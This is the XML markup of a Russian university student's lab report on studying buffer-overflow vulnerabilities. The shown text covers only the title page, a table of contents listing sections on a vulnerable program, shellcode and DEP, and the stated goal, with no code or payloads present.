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A85B28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043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Министерство науки и высшего образования Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BDFB4E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043C59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645E96DB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043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>«Санкт-Петербургский политехнический университет Петра Великого»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE4041" w14:textId="77777777" w:rsidR="00F132AC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043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283B848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Институт компьютерных наук и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>кибербезопасности</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2241849D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Высшая школа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>кибербезопасности</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46894870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1BACBC84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4CC8E6E6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524EE251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374D1252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22C4A5EA" w14:textId="77777777" w:rsidR="00F132AC" w:rsidRPr="00B15F77" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:ind w:left="851" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1DB87A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283B228C" w14:textId="358F3906" w:rsidR="00F132AC" w:rsidRPr="00CA3A5D" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ЛАБОРАТОРНАЯ РАБОТА №</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA92302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  <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B0EEE0" w14:textId="16532602" w:rsidR="00F132AC" w:rsidRPr="00043C59" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Изучение программных уязвимостей типа </w:t>
      </w:r>
      <w:r w:rsidR="006C28B6" w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>переполнение буфера</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED480E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>по дисциплине «</w:t>
      </w:r>
      <w:r w:rsidR="00FE0064">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Основы информационной безопасности</w:t>
      </w:r>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8D7A0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6004DD34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35A70A0E" w14:textId="795F213D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64397FB8" w14:textId="77777777" w:rsidR="00F132AC" w:rsidRPr="00043C59" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE59E5F" w14:textId="007938DF" w:rsidR="00F132AC" w:rsidRPr="00017252" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Выполнил</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA0A2D8" w14:textId="4E3C96A8" w:rsidR="00F132AC" w:rsidRPr="00F132AC" w:rsidRDefault="00F132AC" w:rsidP="00FE0064">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>студент гр. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5131001</w:t>
      </w:r>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>50601</w:t>
      </w:r>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B63D9B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B63D9B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A19D9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Побирчев</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A19D9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Н.А</w:t>
      </w:r>
      <w:r w:rsidR="00FE0064">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169429C3" w14:textId="77777777" w:rsidR="00F132AC" w:rsidRPr="00B63D9B" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000F1599" w14:textId="77777777" w:rsidR="00EB3B2A" w:rsidRDefault="00EB3B2A" w:rsidP="00EB3B2A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1701"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Проверил</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA5E9C" w14:textId="5FF60E1B" w:rsidR="00F132AC" w:rsidRPr="00B63D9B" w:rsidRDefault="00EB3B2A" w:rsidP="00EB3B2A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1701"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0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Пахомов М.А.</w:t>
      </w:r>
      <w:r w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F132AC" w:rsidRPr="00043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C5CB1" w14:textId="77777777" w:rsidR="00F132AC" w:rsidRPr="00043C59" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6946"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="079CB9DC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2292F24F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7A667BD0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bookmarkStart w:id="0" w:name="_gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="48A8E6D4" w14:textId="348C6557" w:rsidR="00F132AC" w:rsidRPr="00043C59" w:rsidRDefault="00F132AC" w:rsidP="004468C5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AC2E0E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726F9D29" w14:textId="77777777" w:rsidR="00F132AC" w:rsidRPr="00043C59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043C59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Санкт-Петербург</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EED1213" w14:textId="192E0FED" w:rsidR="00F132AC" w:rsidRPr="00A51A8A" w:rsidRDefault="00F132AC" w:rsidP="00F132AC">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="00FE0064">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> год</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB3733" w14:textId="77777777" w:rsidR="009753DE" w:rsidRDefault="009753DE" w:rsidP="006B6886">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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1FE16045" w14:textId="77777777" w:rsidR="006E22C2" w:rsidRDefault="006E22C2" w:rsidP="004468C5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pP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1534844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36E825" w14:textId="37C125B3" w:rsidR="006E22C2" w:rsidRPr="00EB3B2A" w:rsidRDefault="00812AEA" w:rsidP="00EB3B2A">
          <w:pPr>
            <w:pStyle w:val="affd"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:caps/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00EB3B2A">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:caps/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Содержание</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3B67CB71" w14:textId="27189AEF" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="006E22C2">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00EB3B2A">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00EB3B2A">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00EB3B2A">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc225271643" w:history="1"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1</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs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Цель работы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instrText xml:space="preserve"> PAGEREF _Toc225271643 \h </w:instrTex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>3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end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17F47CF4" w14:textId="7397DF85" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271644" w:history="1"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2</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs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Задачи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instrText xml:space="preserve"> PAGEREF _Toc225271644 \h </w:instrTex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>4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end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="196A5A62" w14:textId="1835FC24" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271645" w:history="1"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3</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs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Ход работы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instrText xml:space="preserve"> PAGEREF _Toc225271645 \h </w:instrTex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>5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end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="201A2EDB" w14:textId="03433B49" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271646" w:history="1"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3.1</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof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Написание уязвимой программы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instrText xml:space="preserve"> PAGEREF _Toc225271646 \h </w:instrTex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>5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844574" w14:textId="2CA6EE90" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271647" w:history="1"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3.2</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof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Написание шелл кода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instrText xml:space="preserve"> PAGEREF _Toc225271647 \h </w:instrTex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>7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6927F8" w14:textId="6EA760C1" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271648" w:history="1"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4</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs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Ответы на контрольные вопросы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instrText xml:space="preserve"> PAGEREF _Toc225271648 \h </w:instrTex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>9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end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="152F0ABF" w14:textId="459A91B1" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271649" w:history="1"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4.1</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof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Какие основные этапы выделяют при реализации атаки, эксплуатирующей уязвимости типа “переполнение буфера”?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instrText xml:space="preserve"> PAGEREF _Toc225271649 \h </w:instrTex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>9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BBF6F6" w14:textId="40BBAA43" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271650" w:history="1"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4.2</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof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Почему стек является уязвимым при передаче параметров функции?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instrText xml:space="preserve"> PAGEREF _Toc225271650 \h </w:instrTex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>9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FE1055" w14:textId="0E2563BD" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271651" w:history="1"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4.3</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof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 xml:space="preserve">Одинаков ли адрес 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CALL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 xml:space="preserve"> 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ESP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 xml:space="preserve"> в различных версия ОС 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Windows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?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instrText xml:space="preserve"> PAGEREF _Toc225271651 \h </w:instrTex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>9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C58C55" w14:textId="24E9DB63" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271652" w:history="1"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4.4</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof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Могут ли инструкции быть выполнены где-либо кроме сегмента кода?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instrText xml:space="preserve"> PAGEREF _Toc225271652 \h </w:instrTex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>9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A571AC" w14:textId="12223454" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271653" w:history="1"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4.5</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof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 xml:space="preserve">Опишите работу механизма защиты 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Data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 xml:space="preserve"> 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Execution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 xml:space="preserve"> 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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Prevention</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rStyle w:val="aff6"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>. Каким образом он позволяет защитить систему от эксплуатации уязвимостей типа “переполнение буфера”?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instrText xml:space="preserve"> PAGEREF _Toc225271653 \h </w:instrTex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t>10</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"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069054" w14:textId="7F65A4B3" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271654" w:history="1"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5</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r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Выводы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instrText xml:space="preserve"> PAGEREF _Toc225271654 \h </w:instrTex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>11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end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FDBACE0" w14:textId="4BF27483" w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A" w:rsidRDefault="00262EE7">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc225271655" w:history="1">
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rStyle w:val="aff6"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ А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ab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begin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instrText xml:space="preserve"> PAGEREF _Toc225271655 \h </w:instrTex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separate"/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t>12</w:t>
            </w:r>
            <w:r w:rsidR="00D81DEB" w:rsidRPr="00EB3B2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10EB2E87" w14:textId="0AECC231" w:rsidR="009753DE" w:rsidRPr="000E640D" w:rsidRDefault="006E22C2" w:rsidP="006C28B6">
          <w:pPr>
            <w:ind w:firstLine="0"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00EB3B2A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29649A55" w14:textId="77777777" w:rsidR="00601F8B" w:rsidRDefault="007350A2" w:rsidP="00CD2144">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc225271643"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ц</w:t>
      </w:r>
      <w:r w:rsidR="00987AA9">
        <w:t>ель работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="11745A7C" w14:textId="4CE65536" w:rsidR="003E32B5" w:rsidRPr="002B77EF" w:rsidRDefault="003E32B5" w:rsidP="003E32B5">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r w:rsidRPr="002B77EF">
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t xml:space="preserve">риобретение навыков по прикладному анализу программных уязвимостей типа </w:t>
      </w:r>
      <w:r w:rsidR="00610C6C" w:rsidRPr="00610C6C">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t>переполнение буфера</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C" w:rsidRPr="00610C6C">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002B77EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t>и по предотвращению их эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8124F5" w14:textId="37C00371" w:rsidR="005F51CB" w:rsidRPr="003E32B5" w:rsidRDefault="005F51CB" w:rsidP="003E32B5">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13816594" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRDefault="001F1F3F" w:rsidP="00CD2144">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc225271644"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
